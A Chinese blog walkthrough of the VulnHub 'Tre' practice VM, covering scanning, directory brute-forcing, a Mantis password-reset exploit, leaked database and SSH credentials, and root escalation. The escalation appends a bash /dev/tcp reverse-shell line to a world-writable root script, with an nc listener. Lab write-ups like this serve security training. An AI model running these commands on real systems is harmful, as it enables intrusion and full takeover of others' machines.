Vulnhub:Tre靶机渗透测试

已于 2024-05-08 16:33:34 修改
阅读量394 收藏 8
点赞数 3
分类专栏: VulnHub 文章标签: 网络安全 安全 linux
于 2024-05-07 19:58:07 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Aukum/article/details/138543220
版权

信息收集

1、主机扫描

# 扫192.168.56.0/24段所有开放主机
namp 192.168.56.0/24 -sN

确认靶机ip:192.168.56.131。继续信息收集。

#扫描操作系统
namp 192.168.56.131 -O
#扫描端口对应服务和版本号
namp 192.168.56.131 -sV

既然开放了80端口就访问一下。访问发现80端口和8082端口中间件虽然不同但是两个web首页是一样的,竹子。

2、目录扫描

dirsearch -u http://192.168.56.131

  • /cms/site/---->网站页面

  • /adminer.php ---->一个数据库登录页面

  • /info.php---->一个敏感信息泄露,该页面返回phpinfo信息。

  • /system---->登录框

Web渗透

/cms/site

/cms/site/,一个cms站点,搜搜看有没有可利用的。

没发现可利用的点。

/system

登录框,尝试弱口令。这里账户密码都是admin。

进入如下页面:

尝试sql注入无果。开始搜,mantis,发现这是一个基于Web的开源漏洞跟踪系统。存在任意密码重置漏洞,网上有exp直接用。

/verify.php?id=1&confirm_hash=

进入密码重置页面。

用户名:administrator,重置密码为admin。成功进入后台管理系统。

用户管理里记录有两个账号。

/adminer.php

/system使用admin弱口令登录时返回包内容如下:

Authorization: Basic YWRtaW46YWRtaW4=  是拿来验证身份的。加上这个身份验证再扫描一次目录。

# dirsearch 扫描
dirsearch -u xxx --header="Authorization:Basic YWRtaW46YWRtaW4="
#(这里不知道为什么扫不出)
# 换成dirb扫描 
# dirb url -u 弱口令账户密码
dirb url -u admin:admin

挨着看。

/system/config/a.txt里,有好东西,密码账号都给了,既然是数据库的账户、密码、数据库名,直接到adminer.php页面尝试登录。

进入数据库管理系统,找找有没有user表。发现一个mantis_user_table表。

既然都拿到账户了,合理猜测realname是密码,ssh登录。

两个都试一下。

账号:tre
密码:Tr3@123456A!

提权-SUID

# 找所有root创建,并且有读写权限的文件
find / -user root -type f -perm -o=rw -ls 2>/dev/null
#2>/dev/null --》将标准错误输出重定向到/dev/null,这个文件相当于垃圾桶

这里发现一个不一样的文件/usr/bin/check-system,看一下文件内容。

大概意思是每隔一分钟打印一次系统时间。内容先不说,主要是root权限,直接加上反弹shell。

1、开启监听
nc -nvlp 4444
2、写入反弹shell
vi /usr/bin/check-system
加上bash -i >& /dev/tcp/攻击机ip/监听端口 0>&1;

# 重启
sudo shutdown -r

Aukum
关注
  • 3
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
实战打靶集锦-020-Tre
阿尔泰野狼的博客
05-18 668
本文记录了博主的一次曲折打靶经历,包含dirb挂在big.txt扫描,系统可执行脚本提权等。
靶机渗透测试(Tre: 1)
@小张小张的博客
09-21 955
靶机渗透测试(Tre: 1): Vulnhub靶机 Tre: 1 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机靶机难度:(Intermediate) 目标:Get the root shell i.e.(root@localhost:~#) and then obtain flag under /root). 渗透流程: 1. 探测靶机ip地址(netdiscover -i eth0 -r 网关) 得到靶机ip地址为:182.168.10.175;
vulnhub之tre1
weixin_54431413的博客
07-07 697
主要介绍突破边界的方法,已知漏洞的利用,Authorization:Basic YWRtaW46YWRtaW4=数据包头部登录验证,进阶目录爆破,以及通过shell脚本来提权。
vulnhub-Tre(cms渗透)
菜菜的博客
12-21 7018
这个靶机的内容总体来说还是很简单的,对于新手还是很不错的,这个靶机主要由web服务中找到了cms,使用searchsploit来搜索对应的cms漏洞利用payload,拿来直接调用,获取低权限,然后使用find查看拥有suid权限的文件,通过里面添加反弹shell,运行来获得root权限。
Tre靶场通关过程(linpeas使用+启动项编辑器提权)
tpaer的博客
05-07 2220
通过信息收集获得到了普通用户账号密码,利用PEASS-ng的linpeas脚本进行提权的信息收集再进行提权。
EscapeRoomController:TRE逃生室控制器
05-08
EscapeRoomController TRE逃生室控制器您最好从GitHub存储库下载.zip文件并提取内容,然后将EscapeRoomGames目录复制到硬盘驱动器上的某个位置。 尝试在安装程序目录中使用安装程序。 当前,安装程序未在桌面或程序...
TRE:TRE Algopol(〜14年6月6日)
05-07
TRE Algopol 注意:此存储库出于实现目的而处于联机状态,此处不包括构建该存储库的某些部分所需的大多数内容(例如,报告/幻灯片)。 最终的幻灯片座。 这项工作是在2014年2月至2014年6月之间完成的。 安装 ...
ngrep-tre:ngrep与tre http
05-21
标题中的“ngrep-tre:ngrep与tre http”指的是一个关于网络数据包过滤工具ngrep与正则表达式库TRE(Text REgular expression)整合应用在HTTP协议解析上的项目。ngrep是一个功能强大的命令行工具,类似于tcpdump,但...
tre.rar_tre系统
09-23
【标题】"tre.rar_tre系统"所涉及的是一个基于Visual Basic(VB)开发的系统托盘图标程序,名为"tre系统"。该程序能够实现在操作系统任务栏的系统托盘区域显示图标,并可能提供了相应的功能操作。 【描述】描述中...
Tre7:特雷7-开源
04-26
经典的意大利纸牌游戏,tresette。
靶机实战(10):OSCP备考之VulnHub Tre 1
最新发布
OneMoreThink
01-07 1093
靶机官网:Tre: 1[1]实战思路:一、主机发现二、端口发现(服务、组件、版本)三、漏洞发现(获取权限)8082端口/HTTP服务组件漏洞URL漏洞(目录、文件)80端口/HTTP服务组件漏洞URL漏洞(目录、文件)22端口/SSH服务组件漏洞口令漏洞80端口/HTTP服务URL漏洞(目录、文件)四、提升权限tre用户sudosuidcron后记一、主机发现本次攻击指定IP,不涉及主机发现过程。...
Tre靶机打靶过程及思路
qq_52610024的博客
07-21 1049
4.利用mantis密码重置漏洞进入到后台管理界面,在manage功能下再次发现ssh可登录的账号密码。3.访问到敏感目录下sysytem下的数据库账号配置文件,利用该账号进入数据库查看到可疑账号密码,2.访问到401认证界面,弱口令修改之后登录成功,利用mantis最新版本rce突破外围打点成功。5.查找其他账号下具有可写的root权限文件,找到一个系统的shell脚本,修改该脚本内容。6.成功得到shell,成功得到root权限,打靶完成。,ssh登录得到该账号,外围突破完成。1.常规端口及服务发现。.
Tre靶机
小小猪的博客
07-02 323
Tre靶机 arp-scan -l 扫描靶机IP地址 namp -sV -Pn -A x.x.x.131 扫描靶机IP地址 扫描目录 访问info.php,看到数据库 nikto -h x.x.x.131进行网页扫描,可以看到system中登陆账号密码均是admin/admin; admin/admin登陆: 得到如下界面 访问mantisbt/config目录 这个密码可以在adminer.php登陆; 数据库中找到了 登录成功 可以看到
vulnhub-Tre-Tre1-wp
yutianovo的博客
09-01 399
靶机描述 Machine Name: Tre Author: SunCSR Team Difficulty: Intermediate Tested: VMware Workstation 15.x Pro (This works better with VMware rather than VirtualBox) DHCP: Enabled Goal: Get the root shell i.e.(root@localhost:~#) and then obtain flag under /root).
Vulnhub靶机系列:Hackademic: RTB1
汗的博客
03-30 2191
https://www.hackingarticles.in/hack-the-hackademic-rtb1-vm-boot-to-root/ 文章目录靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址 https://www.vulnhub.com/entry/hackademic-rtb1,17/ 靶机设置 利用知识及工具 信息收集并getshell 提权 总结 ...
Vulnhub靶机系列:Tr0ll: 1
汗的博客
03-31 1583
这次的靶机Vulnhub靶机:Tr0ll: 1 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址及相关描述 https://www.vulnhub.com/entry/tr0ll-1%2C100/ 文件大小: 434 MB MD5: 318FE0B1C0DD4FA0A8DCA43EDACE8B20 SHA1: 9C459ED10166ACAB9B7D8...
靶机 TRE
m0_46580995的博客
09-23 413
目录爆破 adminer 4.7.7 版本不符 暴力破解目录 找到配置文件 ssh登录 查权限 s
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8374
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值